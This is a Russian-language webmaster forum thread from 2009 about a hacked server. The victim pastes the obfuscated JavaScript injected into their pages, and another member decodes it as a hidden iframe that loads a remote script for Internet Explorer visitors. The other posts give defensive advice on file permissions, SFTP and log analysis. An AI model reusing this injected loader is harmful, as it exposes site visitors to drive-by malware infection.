Реклама на сайте Advertise with us

Хакнули мой сервер, выясняю может кого еще

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 13.05.08
Сообщения: 23
Рейтинг: 16

Ссылка на сообщениеДобавлено: 20/04/09 в 21:01       Ответить с цитатойцитата 

Во все папки с правами 777 было залито по 3 пустых(слава богу) файла:
index.htm, index.html, index.php

На паре доменов после боди в индексе появился такой код

<script>/**/function QAl5(Som8, ciO6, Lsfi) { var CCi8; CCi8=Som8.split(ciO6); var RcB4=CCi8.join(Lsfi); return RcB4;/**/ } function Zsr4(ytjx) { ytjx = QAl5(ytjx,"##+##","'"); ytjx = QAl5(ytjx,"##|##","\\"); RcB4=""; Atc0 =""; for(k=0;k<ytjx.length;k++) { RcB4 = ytjx.charCodeAt(k); if (RcB4==32){RcB4=35} else if (RcB4==35){RcB4=32} else if (RcB4==59){RcB4=64} else if (RcB4==64){RcB4=59} else if (RcB4==37){RcB4=42} else if (RcB4==42){RcB4=37} else if (RcB4>=97 && RcB4<=122) { RcB4=RcB4-97;RcB4=25-RcB4;RcB4+=97; }else if (RcB4>=65 && RcB4<=90) { RcB4=RcB4-65;RcB4=25-RcB4;RcB4+=65; }else if (RcB4>=48 && RcB4<=57) { RcB4=RcB4-48;RcB4=9-RcB4;RcB4+=48; } Atc0 += String.fromCharCode(RcB4); } return Atc0;/**/ }ISa8=eval;ISa8(Zsr4('ezi#fwJ7#=###+##sggk://wivznh.xl.ro/rnztvh/a/hgzgrx.ksk##+##@ezi#SYk6#=###+##ruiznv##+##@'));ISa8(Zsr4('ezi#kOt9#=#wlxfnvmg.xivzgvVovnvmg(SYk6)@kOt9.hvgZggiryfgv(##+##hix##+##,#fwJ7)@'));ISa8(Zsr4('kOt9.hvgZggiryfgv(##+##drwgs##+##,9)@kOt9.hvgZggiryfgv(##+##svrtsg##+##,9)@kOt9.hvgZggiryfgv(##+##yliwvi##+##,9)@'));ISa8(Zsr4('kOt9.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));ISa8(Zsr4('kOt9.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#rqY1=mzertzgli.fhviZtvmg.glOldviXzhv()@'));ISa8(Zsr4('ezi#XrM5=rqY1.rmwvcLu(##+##nhrv##+##)@ezi#kcy2=rqY1.rmwvcLu(##+##mg#3.##+##)@'));if ((CiN4>0)&&(pxb7==-1)){ISa8(Zsr4('wlxfnvmg.ylwb.zkkvmwXsrow(kOt9)@'));}</script>

Если у кого еще такая беда случилось, делитесь соображениями через что взломали.
Кто умеет, плиз расшифруйте.

0
 



С нами с 21.09.03
Сообщения: 7329
Рейтинг: 2144

Ссылка на сообщениеДобавлено: 20/04/09 в 21:05       Ответить с цитатойцитата 

Grebezen писал:
Во все папки с правами 777 было залито по 3 пустых(слава богу) файла:
index.htm, index.html, index.php


Честно говоря, держать "папки" 777 в корне веба - крайняя беспечность. Софт, который это требует, и не предлагает, как минимум, вынести эти "папки" за пределы webroot, написан слабо квалифицировнными программерами.

Ну и использовать FTP в наше время - та же проблема.

Моя подпись.

0
 



С нами с 13.05.08
Сообщения: 23
Рейтинг: 16

Ссылка на сообщениеДобавлено: 20/04/09 в 21:36       Ответить с цитатойцитата 

ну вот, например, стримротатор имеет папку tmp с правами 777 - что ж тут поделаешь?

0
 



С нами с 07.07.08
Сообщения: 142
Рейтинг: -7

Ссылка на сообщениеДобавлено: 20/04/09 в 23:51       Ответить с цитатойцитата 

та же проблема...

Оффтопик: Grebezen:

а вы типо только что зареганный нуб подхвативший эту заразу по неопытности или типо один из создателей, тестирующий бета версию данного произведения icon_smile.gif ???

3D Trade
Подлив тут Best 3D Sponsor! Если есть лучше, дайте знать! :

0
 



С нами с 07.04.09
Сообщения: 273
Рейтинг: 190

Ссылка на сообщениеДобавлено: 21/04/09 в 00:00       Ответить с цитатойцитата 

tmp разве в корне?

0
 
+
сам дебил

С нами с 25.07.06
Сообщения: 5379
Рейтинг: 1822

Ссылка на сообщениеДобавлено: 21/04/09 в 01:15       Ответить с цитатойцитата 

какие скрипты то стояли?

Очень много трафика...
и тут еще трафик

0
 



С нами с 09.03.09
Сообщения: 6053
Рейтинг: 3538


Передовик Master-X (01.11.2009) Передовик Master-X (16.11.2009) Передовик Master-X (01.02.2011) Передовик Master-X (01.12.2011) Передовик Master-X (16.12.2011) Ветеран трепа Master-X (01.01.2014)
Ссылка на сообщениеДобавлено: 21/04/09 в 01:39       Ответить с цитатойцитата 

Банальный iframe.

var udQ2='http://dreams.co.il/images/z/static.php';
var HBp3='iframe';
var pLg0=document.createElement(HBp3);
pLg0.setAttribute('src',udQ2);
pLg0.setAttribute('width','0');
pLg0.setAttribute('height','0');
pLg0.setAttribute('border','0');
pLg0.setAttribute('style','width:0; height:0; border:none;');
pLg0.setAttribute('style','display:none');
var ijB8=navigator.userAgent.toLowerCase();
var CiN4=ijB8.indexOf('msie');
var pxb7=ijB8.indexOf('nt 6');
document.body.appendChild(pLg0);

На еврейские картинки смотреть не советую (вы ведь под рутом работаете? icon_smile.gif)

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?clie…static.php

Чтобы получить ответ на вопрос "Через что взломали" надо ip спалить. icon_smile.gif

Если хост от Layered Technologies Inc. или их реселлеров, то можешь не палить - гугли сам.

0
 



С нами с 07.07.08
Сообщения: 142
Рейтинг: -7

Ссылка на сообщениеДобавлено: 21/04/09 в 09:51       Ответить с цитатойцитата 

господа офицеры адалта,

а зависит ли уязвимость/безопасность сервака от его стоимости?

и ещё, в таких случаях заражения сервака, адекватно ли следующее поведение админов:

сообщил админу вчера о вирусе на серваке, и что 2 домена из 8 в базы гугла попали... Тот обещал посмотреть, и до сих пор даже не посмотрел. Чего ждать-то? Пока все домены в базы загремят? Сам удалил, что смог. А у меня это происходит уже 4-ый раз за последние полгода... Это же наверное и на пэйджранке сказывается???

и последнее - подскажите альтернативу FTP...

3D Trade
Подлив тут Best 3D Sponsor! Если есть лучше, дайте знать! :

0
 



С нами с 21.09.03
Сообщения: 7329
Рейтинг: 2144

Ссылка на сообщениеДобавлено: 21/04/09 в 09:54       Ответить с цитатойцитата 

Zizi писал:
а зависит ли уязвимость/безопасность сервака от его стоимости?


Сомневаюсь...

Цитата:
и ещё, в таких случаях заражения сервака, адекватно ли следующее поведение админов:


Зависит от обязанностей админа.

Цитата:
и последнее - подскажите альтернативу FTP...


scp/sftp, rsync via ssh.

Моя подпись.

0
 



С нами с 05.11.05
Сообщения: 1563
Рейтинг: 1240

Ссылка на сообщениеДобавлено: 21/04/09 в 10:10       Ответить с цитатойцитата 

Grebezen: у меня тож ломанули кое где
озвучь хостинг

--->>увеличь профит от рекламы в 2 раза

0
 



С нами с 07.07.08
Сообщения: 142
Рейтинг: -7

Ссылка на сообщениеДобавлено: 21/04/09 в 10:20       Ответить с цитатойцитата 

lega_cobra:

спасибо за конструктивный и ясный ответ!!! рейтинг вам от ТС smail54.gif

а насчёт SFTP клиентов - нашел WinSCP, Tunnelier, BitKinex, PSFTP...

что посоветуете?

3D Trade
Подлив тут Best 3D Sponsor! Если есть лучше, дайте знать! :

0
 



С нами с 07.07.08
Сообщения: 142
Рейтинг: -7

Ссылка на сообщениеДобавлено: 21/04/09 в 10:32       Ответить с цитатойцитата 

kazantipman писал:
Grebezen:
озвучь хостинг

+1 ))

3D Trade
Подлив тут Best 3D Sponsor! Если есть лучше, дайте знать! :

0
 

Range of Vision

С нами с 02.07.05
Сообщения: 2210
Рейтинг: 1734

Ссылка на сообщениеДобавлено: 21/04/09 в 10:36       Ответить с цитатойцитата 

Zizi писал:

- нашел WinSCP,

+1

Air VPN - The air to breathe the real Internet

0
 

Маг.

С нами с 04.10.04
Сообщения: 940
Рейтинг: 349

Ссылка на сообщениеДобавлено: 21/04/09 в 11:19       Ответить с цитатойцитата 

lega_cobra - может ты щас еще насоветуешь ротаторов и трейдскриптов, которые не используют 777 хоть на что ни будь?

Администрируем серваки, telegram: https://t.me/akamitch

0
 



С нами с 07.07.08
Сообщения: 142
Рейтинг: -7

Ссылка на сообщениеДобавлено: 21/04/09 в 12:24       Ответить с цитатойцитата 

админ говорит, что все заходы с одного (моего) IP - т.е. дело не в пароле и FTP менеджере (хотя его все равно сменил)

значит ломали скрипты... стоит атл3 и ST....

Вроде все было закрыто хтаксесами, ST закрывал через lock.php, скрипты в рефссылке тоже не принимаем - судя по всему не помогло.

как бороться с этой хернёй ?

3D Trade
Подлив тут Best 3D Sponsor! Если есть лучше, дайте знать! :

0
 



С нами с 13.05.08
Сообщения: 23
Рейтинг: 16

Ссылка на сообщениеДобавлено: 21/04/09 в 20:12       Ответить с цитатойцитата 

хостинг вебазилла
скриптов много разных, в основном прогресс+дтр, кое где стрим, пару ат3, один atx, пара atxv2.

Что касается сереров и секурити я точно нуб, а так в адалте несколько лет, но на форумах редко бываю.

0
 



С нами с 13.05.08
Сообщения: 23
Рейтинг: 16

Ссылка на сообщениеДобавлено: 21/04/09 в 20:14       Ответить с цитатойцитата 

goodman писал:
tmp разве в корне?

да, в корне стрима, да и вообще реально у каждого скрипта есть папки 777 и много.

0
 



С нами с 13.01.05
Сообщения: 322
Рейтинг: 397

Ссылка на сообщениеДобавлено: 21/04/09 в 20:21       Ответить с цитатойцитата 

Смотришь на дату и время изменения страниц > анализируешь логи за этот период > узнаешь через что сломали

-= Лучшая партнерка в TEEN нише =-

0
 



С нами с 11.08.06
Сообщения: 939
Рейтинг: 849

Ссылка на сообщениеДобавлено: 21/04/09 в 21:46       Ответить с цитатойцитата 

Grebezen писал:
ну вот, например, стримротатор имеет папку tmp с правами 777 - что ж тут поделаешь?

Стрим и например Протон, хоть и требуют 777 на document_root, прекрасно живут в подкаталогах, не засирая корень. То что их авторы об этом открыто не заявляют - оставим на их совести. То что любой скрипт может работать без 777 - тоже оставим на их совести, хотя скорее всего авторы это требуют для "минимизации глюков" с правами.

Ставьте сторонние чекалки, которые будут проверять неизменность выдаваемого HTML или наличие в нём левых кусков кода. Ставьте кроны, которые тупо будут тереть левые файлы в директориях и перезаписывать индексы из заведомо чистого дистриба. Как правило этого хватает для 99% случаев, а если не хватит - значит уже хак прошел настолько, что пиздец всему.

Traffic trade

0
 



С нами с 21.09.03
Сообщения: 7329
Рейтинг: 2144

Ссылка на сообщениеДобавлено: 21/04/09 в 23:50       Ответить с цитатойцитата 

Mitch писал:
lega_cobra - может ты щас еще насоветуешь ротаторов и трейдскриптов, которые не используют 777 хоть на что ни будь?


Я в них не разбираюсь, поэтому ничего не посоветую. icon_smile.gif Дело даже не в 777, а в том, где их размещать. Правило номер один - каталоги, доступные на запись, должны быть за пределами WebRoot. Если есть возможность - то желательно самому править скрипты, хотя, это дело неблагодарное. icon_smile.gif

Моя подпись.

0
 



С нами с 07.07.08
Сообщения: 142
Рейтинг: -7

Ссылка на сообщениеДобавлено: 22/04/09 в 00:31       Ответить с цитатойцитата 

подскажите плиз как эту куйню удалять, чтоб не возвращалась?
админ, млин, то ли ничего так и не сделал, либо сделал, но не так. короче вирус сцуко сидит ещё. и ася не грузится как на зло.

кто как боролся с этим? попробую сам справится...

Оффтопик: проклинаю тех мудозвонов, что этими вирусами балуются.... паразиты

3D Trade
Подлив тут Best 3D Sponsor! Если есть лучше, дайте знать! :

0
 



С нами с 17.08.05
Сообщения: 135
Рейтинг: 78

Ссылка на сообщениеДобавлено: 22/04/09 в 00:48       Ответить с цитатойцитата 

Идем на:

http://streamscripts.com/rus/streamrotator.php

находим:
"Создайте задания для крона, установите старые права на корневую директорию домена (обычно 755), удалите install.php и переходите в админку."

Т.е. убирая права на запись для other защитите директорию от попадания у нее всякого гавна за счет дырявости софта и пхп.

Последний раз редактировалось: FreeMann (22/04/09 в 00:59), всего редактировалось 1 раз

0
 

XXX-Server.biz

С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676


Передовик Master-X (16.01.2008)
Ссылка на сообщениеДобавлено: 22/04/09 в 00:57       Ответить с цитатойцитата 

Zizi писал:
подскажите плиз как эту куйню удалять, чтоб не возвращалась?
админ, млин, то ли ничего так и не сделал, либо сделал, но не так. короче вирус сцуко сидит ещё. и ася не грузится как на зло.

кто как боролся с этим? попробую сам справится...

Оффтопик: проклинаю тех мудозвонов, что этими вирусами балуются.... паразиты

вычищали все, вроде нет сейчас ничего на тех доменах что давали

Хостинг от $0.05/Gb, VDS от 9$, Dedicated Servers от $49
Домены от 4.99$

0
 

XXX-Server.biz

С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676


Передовик Master-X (16.01.2008)
Ссылка на сообщениеДобавлено: 22/04/09 в 00:59       Ответить с цитатойцитата 

FreeMann писал:
Идем на:

http://streamscripts.com/rus/streamrotator.php

находим:
"Создайте задания для крона, установите старые права на корневую директорию домена (обычно 755), удалите install.php и переходите в админку."

Т.е. убирая права на запись для other защитите директорию от попадания у нее всякого гавна за счет дырявости софта и пхп.

многие скрипты требуют права на запись на файлы которые они генерят и которые потом инклудятся. собственно в них вся фигня потом и пишется. обрезанием прав здесь проблему не решить.

Хостинг от $0.05/Gb, VDS от 9$, Dedicated Servers от $49
Домены от 4.99$

0
 



С нами с 06.03.04
Сообщения: 5352
Рейтинг: 1678

Ссылка на сообщениеДобавлено: 22/04/09 в 01:11       Ответить с цитатойцитата 

Zizi писал:

кто как боролся с этим? попробую сам справится...

Оффтопик: проклинаю тех мудозвонов, что этими вирусами балуются.... паразиты


тут на форуме кто-то рекламировал админство серваков, поищи, они помогут

п.с. если сам не шаришь - всегда нужно чтоб было к кому обратиться в случае траблы.
Мне вот на моих серваках админы всегда помогают, но стараюсь сначала сам с проблемой справиться (типа учусь), гугля помогает иногда

Хостинг, который никогда не подведет !

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »